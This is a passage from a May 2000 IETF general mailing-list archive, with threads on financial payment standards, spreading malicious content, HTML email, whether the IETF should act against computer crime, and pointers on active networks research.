> >There is an ANSI Financial Standards body (X9) which is also chair of the
> >ISO Financial Standards group.
> >
> >The electronic commerce payments working group (X9A10) has a draft standard
> >for all electronic retail payments (debit, credit, pre-paid, electronic
> >cash, etc) .. X9.59.
> >
> >
> >misc. ref
> >
> >http://www.x9.org/
> >http://www.x9.org/main_organization.html
> >http://www.x9.org/subcomms/x9a/general/public/general.html
> >http://www.tc68.org/
> >http://www.x9.org/n20.html
> >http://www.garlic.com/~lynn/
> >http://www.garlic.com/~lynn/99.html#224
> >http://www.garlic.com/~lynn/8583flow.htm
> >http://www.garlic.com/~lynn/draft-wheeler-ipki-aads-01.txt
> >
> >& of course my rfc index is also at:
> >
> >http://www.garlic.com/~lynn/rfcietff.htm
> >
> >as well as ietf, payments, security, X9F, and financial glossaries
> >
> >
> >
> >--
> >Anne & Lynn Wheeler [EMAIL PROTECTED], [EMAIL PROTECTED]
> > http://www.garlic.com/~lynn/ http://www.adcomsys.net/lynn/
> >
> >
> >
--
Anne & Lynn Wheeler [EMAIL PROTECTED], [EMAIL PROTECTED]
http://www.garlic.com/~lynn/ http://www.adcomsys.net/lynn/
>From owner-ietf-outbound Sun May 21 08:53:00 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA07434
for [EMAIL PROTECTED]; Sun, 21 May 2000 08:50:02 -0400 (EDT)
Received: from monsoon.mail.pipex.net (monsoon.mail.pipex.net [158.43.128.69])
by ietf.org (8.9.1a/8.9.1a) with SMTP id IAA07384
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 08:47:10 -0400 (EDT)
Received: (qmail 2918 invoked from network); 21 May 2000 12:47:11 -0000
Received: from usereu55.uk.uudial.com (HELO GK-VAIO.Dial.pipex.com) (62.188.17.139)
by smtp.dial.pipex.com with SMTP; 21 May 2000 12:47:11 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Sun, 21 May 2000 08:48:56 +0100
To: [EMAIL PROTECTED]
From: Graham Klyne <[EMAIL PROTECTED]>
Subject: New mailing list?
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
References: <"Your message dated Fri, 12 May 2000 14:05:07 -0400"
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 07:31 PM 5/13/00 -0800, [EMAIL PROTECTED] wrote:
> > Actually, there *ARE* important issues here.
>
> > Would the IESG support the creation of a WG to discuss these, with the
> > charter of producing a BCP documenting what *should* be done to minimize
> > these risks in today's internet?
>
>Talking about a WG seems premature. The first step would be to start a
>discussion list and maybe schedule a BOF. If those steps prove fruitful
>a WG would be a possibility.
>
>I can set up a mailing list if you like.
Loath as I am to subscribe to yet another mailing list, one dealing with
ways to control the spread of malicious content is one that I think would
be very worthwhile.
#g
(Who uses an 8-year old version of Microsoft Word, in part as a precaution
against macro viruses ;-)
------------
Graham Klyne
([EMAIL PROTECTED])
>From owner-ietf-outbound Sun May 21 09:02:39 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA07518
for [EMAIL PROTECTED]; Sun, 21 May 2000 09:00:02 -0400 (EDT)
Received: from monsoon.mail.pipex.net (monsoon.mail.pipex.net [158.43.128.69])
by ietf.org (8.9.1a/8.9.1a) with SMTP id IAA07391
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 08:47:14 -0400 (EDT)
Received: (qmail 2940 invoked from network); 21 May 2000 12:47:15 -0000
Received: from usereu55.uk.uudial.com (HELO GK-VAIO.Dial.pipex.com) (62.188.17.139)
by smtp.dial.pipex.com with SMTP; 21 May 2000 12:47:15 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Sun, 21 May 2000 08:58:03 +0100
To: [EMAIL PROTECTED]
From: Graham Klyne <[EMAIL PROTECTED]>
Subject: Feeding the virus thread virus
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]
d.mil>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
I am rather amused at how frequently attempts to solve a problem become
part of the problem.
I went on a "management communications" course once. One of the things I
remember was: "You have one mouth and two ears... use them in
corresponding proportion". Unfortunately, in e-mail, we have 10 fingers
and two eyes :-)
#g
(Who is hereby guilty of having too many fingers, for which I apologize.)
At 08:20 AM 5/15/00 -0400, [EMAIL PROTECTED] wrote:
>PLEASE change the title of this thread. It's borders on a partial self
>denial of service, since the title is now misleading. Thank you.
>
>Bill Flanigan
>
>-----Original Message-----
>From: Henry Clark [mailto:[EMAIL PROTECTED]]
>Sent: Sunday, May 14, 2000 4:35 PM
>To: Jeremy
>Cc: [EMAIL PROTECTED]
>Subject: Re: VIRUS WARNING
>
>
>At 01:38 PM 5/12/00 -0400, Jeremy wrote:
> >Can you plase pleaes stop this Virus Thread.
>
>This thread _is_ the virus...
>
>-
>This message was passed through [EMAIL PROTECTED], which
>is a sublist of [EMAIL PROTECTED] Not all messages are passed.
>Decisions on what to pass are made solely by Harald Alvestrand.
------------
Graham Klyne
([EMAIL PROTECTED])
>From owner-ietf-outbound Sun May 21 09:12:39 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA07703
for [EMAIL PROTECTED]; Sun, 21 May 2000 09:10:02 -0400 (EDT)
Received: from monsoon.mail.pipex.net (monsoon.mail.pipex.net [158.43.128.69])
by ietf.org (8.9.1a/8.9.1a) with SMTP id IAA07398
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 08:47:15 -0400 (EDT)
Received: (qmail 2944 invoked from network); 21 May 2000 12:47:16 -0000
Received: from usereu55.uk.uudial.com (HELO GK-VAIO.Dial.pipex.com) (62.188.17.139)
by smtp.dial.pipex.com with SMTP; 21 May 2000 12:47:16 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Sun, 21 May 2000 09:08:46 +0100
To: [EMAIL PROTECTED]
From: Graham Klyne <[EMAIL PROTECTED]>
Subject: Re: HTML email
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
References: <Your message of "Mon, 15 May 2000 18:22:00 EDT."
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 12:24 AM 5/16/00 -0400, [EMAIL PROTECTED] wrote:
>Well, when we were designing the MIME spec, we went to great lengths
>to cover all the bases - in fact, I've seen one very good use of
>multipart/alternative by somebody with crippling RSI.
>
>He got into the habit of sending commentary to a mailing list as
>multipart/alternative - one part being a *very* brief summary of
>his commentary (usually a sentence or two tops), and the other being
>a message/external-body pointing at a (usually longer) audio file
>that he'd record in greater detail - this was in the days before
>good speech-to-text software.
>
>Yes, it probably violated the letter of the law just a bit, but
>it was certainly in the spirit of it..
Interesting... nothing is new under the sun, etc.
Recently, in considering designs for content negotiation in e-mail, I
considered exactly that model (which is, as far as I can tell, entirely
within the letter of the law). In the end it was rejected for purely
pragmatic reasons -- that proper support for multipart/alternative is not
sufficiently widely available.
(I've just been to WWW9, where one of the themes has been mobile data. One
recurring idea there was the extent to which the problems of mobile data
and accessibility for persons with constrained abilities are, at a purely
technical level, facets of the same problem.)
#g
------------
Graham Klyne
([EMAIL PROTECTED])
>From owner-ietf-outbound Sun May 21 09:22:39 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA07822
for [EMAIL PROTECTED]; Sun, 21 May 2000 09:20:02 -0400 (EDT)
Received: from monsoon.mail.pipex.net (monsoon.mail.pipex.net [158.43.128.69])
by ietf.org (8.9.1a/8.9.1a) with SMTP id IAA07405
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 08:47:17 -0400 (EDT)
Received: (qmail 2948 invoked from network); 21 May 2000 12:47:18 -0000
Received: from usereu55.uk.uudial.com (HELO GK-VAIO.Dial.pipex.com) (62.188.17.139)
by smtp.dial.pipex.com with SMTP; 21 May 2000 12:47:18 -0000
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED] (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Sun, 21 May 2000 09:14:10 +0100
To: Musandu <[EMAIL PROTECTED]>
From: Graham Klyne <[EMAIL PROTECTED]>
Subject: re: Financial Stnadards Work group?
Cc: [EMAIL PROTECTED]
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
Hmmm... a new IETF working group does not a new standard make -- necessarily.
I would suggest clearly documenting the _requirements_ (or goals) for such
a protocol, publishing them as an Internet Draft, and see if anyone
expresses interest. Then you can have a debate about whether and why the
existing standards are or are not adequate. And maybe (just maybe) there
will be a case to design a new protocol, or protocol extensions.
#g
--
At 08:06 AM 5/16/00 +0300, Musandu wrote:
>I do not quiet agree with the current standards, they are a pain in the
>neck. E.g ( Just one example ) I want the internet debit card and the
>devices for charging them to be standard hardware available in any computer
>store. This will allow one to chose any bank or service provider ( instead
>of your money going proprietory ): imagine buying a new modem or router
>every time you change ISPs or buying different kinds of printers for
>printing from different web sites. That is the position of debit card
>recharging buying a new device each time you change the service provider.
>The IETF can help or do you hold alternative views ( give me some
>recharging devices that allow change overs )??
>
>Yours sincerely,
>Nyagudi Musandu
>
>At 10:28 14/05/00 -0700, you wrote:
> >Musandu <[EMAIL PROTECTED]> writes:
> >
> > >It may just be time for the IETF to develop a financial standards
> > >work group separate from the applications work group. I can even >forsee
> >a Simple Cash Transfer Protocol? any objections?
> >
> >There is an ANSI Financial Standards body (X9) which is also chair of the
> >ISO Financial Standards group.
> >
> >The electronic commerce payments working group (X9A10) has a draft standard
> >for all electronic retail payments (debit, credit, pre-paid, electronic
> >cash, etc) .. X9.59.
> >
> >
> >misc. ref
> >
> >http://www.x9.org/
> >http://www.x9.org/main_organization.html
> >http://www.x9.org/subcomms/x9a/general/public/general.html
> >http://www.tc68.org/
> >http://www.x9.org/n20.html
> >http://www.garlic.com/~lynn/
> >http://www.garlic.com/~lynn/99.html#224
> >http://www.garlic.com/~lynn/8583flow.htm
> >http://www.garlic.com/~lynn/draft-wheeler-ipki-aads-01.txt
> >
> >& of course my rfc index is also at:
> >
> >http://www.garlic.com/~lynn/rfcietff.htm
> >
> >as well as ietf, payments, security, X9F, and financial glossaries
> >
> >
> >
> >--
> >Anne & Lynn Wheeler [EMAIL PROTECTED], [EMAIL PROTECTED]
> > http://www.garlic.com/~lynn/ http://www.adcomsys.net/lynn/
> >
> >
> >
>
>-
>This message was passed through [EMAIL PROTECTED], which
>is a sublist of [EMAIL PROTECTED] Not all messages are passed.
>Decisions on what to pass are made solely by Harald Alvestrand.
------------
Graham Klyne
([EMAIL PROTECTED])
>From owner-ietf-outbound Sun May 21 14:02:33 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA09170
for [EMAIL PROTECTED]; Sun, 21 May 2000 14:00:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA09143
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 13:57:23 -0400 (EDT)
Received: from [130.237.150.138] (jph1.dsv.su.se [130.237.150.138])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id TAA01182;
Sun, 21 May 2000 19:57:21 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210102b54c9601e1fc@[193.173.137.42]>
Date: Sun, 21 May 2000 03:18:11 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Should IETF do more to fight computer crime?
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Should IETF do anything to fight the increasing incidences
of net criminality? Can we do anything? Can the protocols,
which IETF manages, be modified so as to make it easier
to fight virus distribution, mail bombing, ping attacks
and the other ways in which people are harassing the
Internet?
Or would such changes to the Internet protocols mean
more invasion of privacy, in a way which is even less
acceptable than letting the criminals continue? It seems
that there is a strong group in IETF which likes the
freedom of the net and believes that changes to stop
criminal usage would also remove this freedom? Is this
true, or can we fight net criminaltiy without risking
the freedom of the net?
Crime prevention outside the net Crime prevention in the net
-------------------------------- ---------------------------
Surveillance, video cameras, Is it possible to allow surveillance on
wiretapping, bugging the net in such ways, that it will not be
misused? IETF did apparently not think
so, when this was discussed at the IETF
meeting in December 1999, where a very
large majority voted against any kind of
help from IETF in this area.
Making crime difficult by locks We have rather little locks, and what we
walls and crime-safe houses. have is not used very much. Why?
video cameras, black boxes and other Is this also not acceptable? Could we log
tools to investigate "after the fact" what happens on the net in ways which
what happended. makes it possible to track the criminals,
without risking misuse which threatens
the freedom of the net?
Laws, detectives, prosecution, Are also applied to net criminals, if
penalties they are caught.
Controlling access to dangerous This method is probably not useful
tools and weapons, like explosives, against computer terrorism. Computers,
etc. like hammers, are the same whether
used for good or bad acts.
Police on the streets. Do we have police on the nets? Do we
accept them? Help them?
International police cooperation. This is essential, computer criminals
often run their crimes over national
borders to make them more difficult to
find and prosecute.
Harmonized laws across countries. Can te laws, as they apply to computers,
be internationally harmonized in ways
which makes it less easy for criminals to
find safe harbours in countries which do
not have the necessary laws?
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Sun May 21 17:01:39 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA10069
for [EMAIL PROTECTED]; Sun, 21 May 2000 17:00:01 -0400 (EDT)
Received: from sol.wwwnexus.com (sol.wwwnexus.com [209.150.128.86])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA10031
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 16:52:26 -0400 (EDT)
Received: from africaservice.com (ti18a02-0143.dialup.online.no [130.67.225.143])
by sol.wwwnexus.com (8.8.5/8.8.5) with ESMTP id PAA14632
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 15:52:23 -0500
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 21 Feb 2000 22:56:35 -0800
From: africaservice <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (Windows NT 5.0; I)
X-Accept-Language: en
MIME-Version: 1.0
To: IETF general mailing list <[EMAIL PROTECTED]>
Subject: Re-Computer Crime
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
We should know that computer technology is as old as we wanted to
accept. The whole thing was not meant for public consumption until after
sometime. Now that it is in the public's domain, many are using the
system reasonably while others find joy in cracking into the system,
allow the crackers to go ahead with what they know how to do best, I
think is a good thing as it will enable computer designers to be more
security conscious and give us a more secured device if this is the tool
we will be using in the future.
Dele Olawole
CEO - Africaservice.com
http://www.africaservice.com
>From owner-ietf-outbound Sun May 21 17:11:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA10224
for [EMAIL PROTECTED]; Sun, 21 May 2000 17:10:02 -0400 (EDT)
Received: from dokka.maxware.no (dokka.maxware.no [195.139.236.69])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA10039
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 16:54:47 -0400 (EDT)
Received: from langfjella.Alvestrand.no ([10.128.167.143])
by dokka.maxware.no (8.9.3/8.9.3) with ESMTP id WAA18811;
Sun, 21 May 2000 22:54:44 +0200
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Sun, 21 May 2000 22:52:38 +0200
To: Jacob Palme <[EMAIL PROTECTED]>, IETF general mailing list <[EMAIL PROTECTED]>
From: Harald Tveit Alvestrand <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
In-Reply-To: <v04210102b54c9601e1fc@[193.173.137.42]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 03:18 21.05.2000 +0200, Jacob Palme wrote:
>Should IETF do anything to fight the increasing incidences
>of net criminality?
Yes - make sure we have tools to establish trust.
Make it less necessary to "trust everyone to be nice".
> Can we do anything? Can the protocols,
>which IETF manages, be modified so as to make it easier
>to fight virus distribution, mail bombing, ping attacks
>and the other ways in which people are harassing the
>Internet?
>
>Or would such changes to the Internet protocols mean
>more invasion of privacy, in a way which is even less
>acceptable than letting the criminals continue? It seems
>that there is a strong group in IETF which likes the
>freedom of the net and believes that changes to stop
>criminal usage would also remove this freedom? Is this
>true, or can we fight net criminaltiy without risking
>the freedom of the net?
>
>Crime prevention outside the net Crime prevention in the net
>-------------------------------- ---------------------------
>
>Surveillance, video cameras, Is it possible to allow surveillance on
>wiretapping, bugging the net in such ways, that it will
>not be
> misused? IETF did apparently not think
> so, when this was discussed at the IETF
> meeting in December 1999, where a very
> large majority voted against any
> kind of
> help from IETF in this area.
Highly contentious also outside the Net.
>Making crime difficult by locks We have rather little locks, and what we
>walls and crime-safe houses. have is not used very much. Why?
Crypto.
>video cameras, black boxes and other Is this also not acceptable? Could
>we log
>tools to investigate "after the fact" what happens on the net in ways which
>what happended. makes it possible to track the
>criminals,
> without risking misuse which threatens
> the freedom of the net?
Signatures.
More work needed, especially thinking about deploying the more esoteric
variants
of signatures, such as "you can only find out who I am if I try to cheat you",
or "I have left proof of my identity in this box, which you cannot open without
accusing me in public of trying to cheat you".
One reason the digital paper trail is so awfully wide is simply because it's
so simple to "just" record the plaintext identities.
------------- below this line, I think it's not IETF business ----------------
>Laws, detectives, prosecution, Are also applied to net criminals, if
>penalties they are caught.
Not the IETF's business.
>Controlling access to dangerous This method is probably not useful
>tools and weapons, like explosives, against computer terrorism. Computers,
>etc. like hammers, are the same whether
> used for good or bad acts.
Agree. Not something we want to do anything about.
>Police on the streets. Do we have police on the nets? Do we
> accept them? Help them?
We have them. Not an IETF problem.
>International police cooperation. This is essential, computer criminals
> often run their crimes over national
> borders to make them more difficult to
> find and prosecute.
They're making cooperation, whether we want it or not.
Not an IETF problem.
>Harmonized laws across countries. Can te laws, as they apply to computers,
> be internationally harmonized in ways
> which makes it less easy for
> criminals to
> find safe harbours in countries
> which do
> not have the necessary laws?
They are being harmonized, whether for good or bad remains to be seen.
Not an IETF problem.
--
Harald Tveit Alvestrand, EDB Maxware, Norway
[EMAIL PROTECTED]
>From owner-ietf-outbound Sun May 21 17:51:27 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA10498
for [EMAIL PROTECTED]; Sun, 21 May 2000 17:50:02 -0400 (EDT)
Received: from mail.activeIQ.com (bedfordexect112.erols.com [208.58.189.12])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA10475
for <[EMAIL PROTECTED]>; Sun, 21 May 2000 17:46:42 -0400 (EDT)
Received: (from rali@localhost)
by mail.activeIQ.com (8.9.3/8.9.3) id RAA28579
for [EMAIL PROTECTED]; Sun, 21 May 2000 17:43:08 -0400
From: R A Lichtensteiger <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
In-Reply-To: <v04210102b54c9601e1fc@[193.173.137.42]> from Jacob Palme at "May
21, 2000 03:18:11 am"
To: IETF general mailing list <[EMAIL PROTECTED]>
Date: Sun, 21 May 2000 17:43:08 -0400 (EDT)
X-PGP-Fingerprint: 3D 39 09 AF 18 C4 85 03 2B F5 2F B6 B9 2B 86 71
X-PGP-Key: lynx -source http://www.tifosi.com/rali/rali.pgp | pgp -fka
X-Mailer: ELM [version 2.4ME+ PL60 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Jacob Palme said:
<> Should IETF do anything to fight the increasing incidences
<> of net criminality? Can we do anything? Can the protocols,
<> which IETF manages, be modified so as to make it easier
<> to fight virus distribution, mail bombing, ping attacks
<> and the other ways in which people are harassing the
<> Internet?
Harald pointed to crypto and signatures. I'd add that there
really are a fair number of tools out there already to do
Intrusion Detection and/or post mortem analysis. There is
also a great deal of knowledge about how to "lock down the
house."
However, just as you can't make the horse drink, you can't
make all of the end networks install or use the existing tools
properly. I'm not sure if this is an argument for pushing the
work off onto IETF wg, or whether it's an argument for "throwing
up ones hands" ...
I think a lot of the work can and OUGHT to be done by the
various vendors -- for examples, routers should, by default,
reject broadcast pings (you could always turn it on if needed)
and mail clients and web browsers should automagically refuse
to run executable content (other than inside a "container").
Reto L.
--
R A Lichtensteiger [EMAIL PROTECTED]
781 276 4500
Could not open /usr/bin/fortune. Lid on cookie jar sealed
>From owner-ietf-outbound Mon May 22 02:04:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id CAA20276
for [EMAIL PROTECTED]; Mon, 22 May 2000 02:00:03 -0400 (EDT)
Received: from ausmtp02.au.ibm.com (ausmtp02.au.ibm.COM [202.135.136.105])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id BAA20233
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 01:55:17 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from f03n07e.au.ibm.com
by ausmtp02.au.ibm.com (IBM AP 1.0) with ESMTP id PAA42746
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 15:49:29 +1000
Received: from d73mta05.au.ibm.com (f06n05s [9.185.166.67])
by f03n07e.au.ibm.com (8.8.8m2/8.8.7) with SMTP id PAA17942
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 15:54:38 +1000
Received: by d73mta05.au.ibm.com(Lotus SMTP MTA v4.6.5 (863.2 5-20-1999)) id
CA2568E7.002074B8 ; Mon, 22 May 2000 15:54:30 +1000
X-Lotus-FromDomain: IBMIN@IBMAU
To: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 22 May 2000 11:05:27 +0530
Subject: Active networks
Mime-Version: 1.0
Content-type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Loop: [EMAIL PROTECTED]
Hi,
I would like to get some info on Active Network. Can somebody help ?
Narayanan.K,
[EMAIL PROTECTED]
>From owner-ietf-outbound Mon May 22 04:30:21 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA27644
for [EMAIL PROTECTED]; Mon, 22 May 2000 04:30:01 -0400 (EDT)
Received: from prv-mail20.provo.novell.com (prv-mail20.provo.novell.com
[137.65.81.122])
by ietf.org (8.9.1a/8.9.1a) with SMTP id EAA27567
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 04:12:34 -0400 (EDT)
Received: from INET-PRV-Message_Server by prv-mail20.provo.novell.com
with Novell_GroupWise; Mon, 22 May 2000 02:01:16 -0600
Message-Id: <[EMAIL PROTECTED]>
X-Mailer: Novell GroupWise Internet Agent 5.5.3.1
Date: Mon, 22 May 2000 02:01:08 -0600
From: "Kumar Subramanian" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Subject: Re: Active networks
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id EAA27567
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 8bit
You can get some information from the following links:
-Kumar
http://www.cc.gatech.edu/projects/canes/publications.html
http://www.cis.upenn.edu/~switchware/
http://www.cis.upenn.edu/~boosters/p4home.html
>>> <[EMAIL PROTECTED]> 05/22/00 11:05AM >>>
Hi,
I would like to get some info on Active Network. Can somebody help ?
Narayanan.K,
[EMAIL PROTECTED]
>From owner-ietf-outbound Mon May 22 04:40:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id EAA27817
for [EMAIL PROTECTED]; Mon, 22 May 2000 04:40:03 -0400 (EDT)
Received: from smtp.mail.yahoo.com (smtp.mail.yahoo.com [128.11.68.32])
by ietf.org (8.9.1a/8.9.1a) with SMTP id EAA27747
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 04:34:46 -0400 (EDT)
Received: from ppp-203-197-9-201.bom.vsnl.net.in (HELO muralidharan) (203.197.9.201)
by smtp.mail.yahoo.com with SMTP; 22 May 2000 01:34:42 -0700
X-Apparently-From: <raghavan?[EMAIL PROTECTED]>
Message-ID: <003e01bfc3c8$c6d226c0$1000a8c0@muralidharan>
Reply-To: "R. Muralidharan" <[EMAIL PROTECTED]>
From: "R. Muralidharan" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Subject: Re: Active networks
Date: Mon, 22 May 2000 14:06:03 +0530
Organization: OSS Systems (India) Pvt Ltd/IEEE Bombay section
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Hi Narayan,
You may refer the IEEE publication : COMPUTER, April 1999 issue which
is a special one on ACTIVE NETWORKS. Visit http://computer.org and navigate
to see the abstract of the article issue.
muralidharan
----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, May 22, 2000 11:05 AM
Subject: Active networks
>
> Hi,
>
> I would like to get some info on Active Network. Can somebody help ?
>
> Narayanan.K,
> [EMAIL PROTECTED]
>
__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com
>From owner-ietf-outbound Mon May 22 05:00:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id FAA28008
for [EMAIL PROTECTED]; Mon, 22 May 2000 05:00:02 -0400 (EDT)
Received: from tclux14.cec.lu (tclux14.cec.lu [158.169.9.51])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id EAA27981
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 04:59:20 -0400 (EDT)
Received: from tclux14.cec.lu (localhost [127.0.0.1])
by tclux14.cec.lu (8.9.3+Sun/8.9.3) with ESMTP id KAA08316;
Mon, 22 May 2000 10:58:35 +0200 (MET DST)
Received: from MX6.CEC.BE (mx6.cec.be [158.169.131.17])
by tclux14.cec.lu (8.9.3+Sun/8.9.3) with SMTP id KAA08312;
Mon, 22 May 2000 10:58:34 +0200 (MET DST)
Received: by MX6.CEC.BE (Soft-Switch LMS 3.2) with x400 via DCNBRU1
id 0057330020616283; Mon, 22 May 2000 10:55:17 +0200
X400-Received: by /PRMD=CEC/ADMD=RTT/C=BE/; Relayed;
Mon, 22 May 2000 10:43:21 +0200
X400-Originator: [EMAIL PROTECTED]
X400-Recipients: non-disclosure:;
X400-MTS-Identifier: [/PRMD=CEC/ADMD=RTT/C=BE/;0057330020616283000002L332]
X400-Content-Type: P2-1988 (22)
Content-Identifier: Re: Should IETF
Date: Mon, 22 May 2000 10:43:21 +0200
From: Gordon Lennox <[EMAIL PROTECTED]> (Tel +32-2-29.6-3546)
To: <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Subject: Re: Should IETF do more to fight computer crime?
Message-ID:
<WIN937-000522090244-606F*/G=Gordon/S=LENNOX/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
In-Reply-To: <v04210102b54c9601e1fc@[193.173.137.42]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Loop: [EMAIL PROTECTED]
One current international position on "Crime in Cyberspace" can be found in the draft
Council of Europe Convention. This was released for public comment towards the end of
April. See:
conventions.coe.int/treaty/en/projets/cybercrime.htm
Information on the Council of Europe can be found at:
www.coe.fr/eng/present/about.htm
Scott Bradner gave a presentation at the G8 hi-tech crime event in Paris last week.
(This was the invitation Fred Baker mentioned during the plenary in Adelaide.) It
would be very interesting to get Scott's views, an IETF view, on how it went in Paris
and on what the G8 is doing...
Gordon
------------------------
European Commission
Information Society DG
Office Bu33 5-80
rue de la Loi 200
B-1049 Bruxelles
Tel: +32-2-29.6-3546
[EMAIL PROTECTED]
========================
>From owner-ietf-outbound Mon May 22 09:10:59 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA01611
for [EMAIL PROTECTED]; Mon, 22 May 2000 09:10:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA01470
for <[EMAIL PROTECTED]>; Mon, 22 May 2000 09:01:36 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id GAA01305;
Mon, 22 May 2000 06:01:10 -0700 (PDT)
Date: Mon, 22 May 2000 06:01:10 -0700 (PDT)
Message-Id: <[EMAIL PROTECTED]>
Subject: asynchronous audio conferencing at www.wimba.com
To: [EMAIL PROTECTED]
From: James Salsman <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
There is finally a cross-platform, quasi-web-based system for
asynchronous audio conferencing:
http://www.wimba.com
This system is new and worth exploring. It uses Java applets
